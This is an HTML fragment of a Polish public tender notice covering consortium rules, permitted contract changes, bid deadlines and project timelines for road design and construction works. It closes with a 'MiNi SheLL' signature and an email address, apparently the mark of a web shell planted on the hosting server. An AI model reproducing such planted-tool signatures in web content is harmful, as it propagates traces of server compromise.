wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 28) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>29) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem (liderem).<br/>30) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonują poszczególni wykonawcy.<br/>31) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <br/>32) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni<br/>przed zwarciem umowy w sprawie zamówienia publicznego są zobowiązaniu przedstawić zamawiającemu stosowną umowę<br/>regulującą współprace tych Wykonawców występujących wspólnie, zawierającą w swej treści następujące postanawiania:<br/> Określenie celu gospodarczego<br/> Oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu zamówienia,<br/> Podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie, zgodnie z oświadczeniem,<br/> Wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z Wykonawców występujących do czasu<br/>wykonania zamówienia w całości,<br/> Solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację przedmiotu zamówienia,<br/> Solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im przysługiwały w związku z realizacją<br/>przedmiotu zamówienia w ramach zawartej z Zamawiającym Umowy<br/> Określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego Wykonawcom w związku z realizacją<br/>zamówienia, zgodnie z którym faktury na rzecz Zamawiającego będzie wystawiał Lider, który będzie się rozliczał<br/>wewnętrznie z drugim członkiem konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy jest dopuszczalna, jeżeli zachodzi jedna z przesłanek wskazanych w art. 455 ustawy pzp.<br/>2. Zamawiający na podstawie art. 455 ust. 1 ustawy pzp przewiduje zmiany niniejszej umowy:<br/>1) z powodu zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy mających wpływ na zakres lub termin<br/>wykonania niniejszej umowy w zakresie niezbędnym do dostosowania się do nowych przepisów,<br/>2) wystąpienia niebezpieczeństwa kolizji z innymi równolegle prowadzonymi robotami przez Zamawiającego lub inne<br/>podmioty w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>3) w przypadku zmiany stawki podatku VAT wprowadzonej przez władzę ustawodawczą w trakcie trwania niemniejszej<br/>umowy,<br/>4) w przypadku nałożenia ograniczeń związanych z działaniem koronawirusa (wirusa SARS-CoV – 2) przejawiającym się<br/>jako epidemia, pandemia lub kwarantanna, ale z w sytuacji gdy ich zakres będzie większy niż zakres zaobserwowany w<br/>dniu otwarcia ofert i jeżeli będą miały faktyczny wpływ na realizację niniejszej umowy. <br/>5) w zakresie zmiany terminów wynikających z umowy, <br/>6) w zakresie zmiany materiałów, urządzeń, rozwiązań technicznych itp.<br/>7) w zakresie zmniejszenia zakresu przedmiotu zamówienia określonego w SWZ wraz załącznikami pod warunkiem, że<br/>wykonanie całości przedmiotu zamówienia napotka istotne trudności, w szczególności spowodowane brakiem uzyskania<br/>planowanego dofinansowania ze środków zewnętrznych. Wykonawcy nie przysługują jakiekolwiek roszczenia związane z<br/>ograniczeniem zakresu realizacji umowy. Zmniejszenie zakresu umowy będzie proporcjonalne do zmniejszonych środków,<br/>8) w zakresie zmian personalnych wśród osób wyznaczonych do realizacji zamówienia pod warunkiem, iż<br/>nowowprowadzone osoby spełniają wymagania określone w postępowaniu o udzielenie zamówienia publicznego<br/>9) w zakresie zmiany wynagrodzenia należnego Wykonawcy:<br/>a) w przypadku zmiany stawki podatku od towaru i usług oraz podatku akcyzowego,<br/>11) Strony dopuszczają możliwość zmiany wysokości wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów<br/>związanych z realizacją zamówienia na zasadach i w sposób określony poniżej, jeżeli zmiany te będą miały wpływ na koszty<br/>wykonania umowy przez Wykonawcę:<br/>a) <br/>12) Zmiany wynagrodzenia wejdą w życie z dniem podpisania aneksu do umowy<br/>13) Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z art. 439 ustawy pzp zobowiązany jest do zmiany<br/>wynagrodzenia przysługującego podwykonawcy lub dalszemu podwykonawcy, z którym zawarł umowę w zakresie<br/>odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione<br/>są następujące warunki:<br/>a) Przedmiotem umowy są roboty budowlane lub usługi,<br/>b) Okres obowiązywania umowy przekracza 12 miesięcy <br/>5. Zamawiający przewiduje także możliwość zmiany niniejszej umowy w stosunku do treści oferty wykonawcy, jeżeli<br/>zachodzi jedna okoliczność, o której mowa w art. 455 ust. 1 pkt. 2-4 i ust. 2 ustawy pzp na warunkach tam określonych<br/>Szczegółowy zakres zmian umowy został określony w SWZ w załączniku Nr 1 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-01 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/edit-auction.html/380880</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-01 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Opracowanie dokumentacji projektowej 10 miesięcy na opracowanie dokumentacji projektowej wraz ze <br/>złożeniem wniosku o wydanie decyzji zezwalającej na realizację <br/>inwestycji drogowej wraz z uzasadnieniem nadania rygoru <br/>natychmiastowej wykonalności - bez uzyskania prawomocnej <br/>decyzji zezwalającej na realizację inwestycji; <br/><br/>Roboty budowlane 11 miesięcy na wykonanie robót budowlanych od uzyskania prawomocnej decyzji ZRID lub wydania decyzji z rygorem <br/>natychmiastowej wykonalności lecz nie później niż do 01.12 <br/>.2024 r..

Creat By MiNi SheLL
Email: jattceo@gmail.com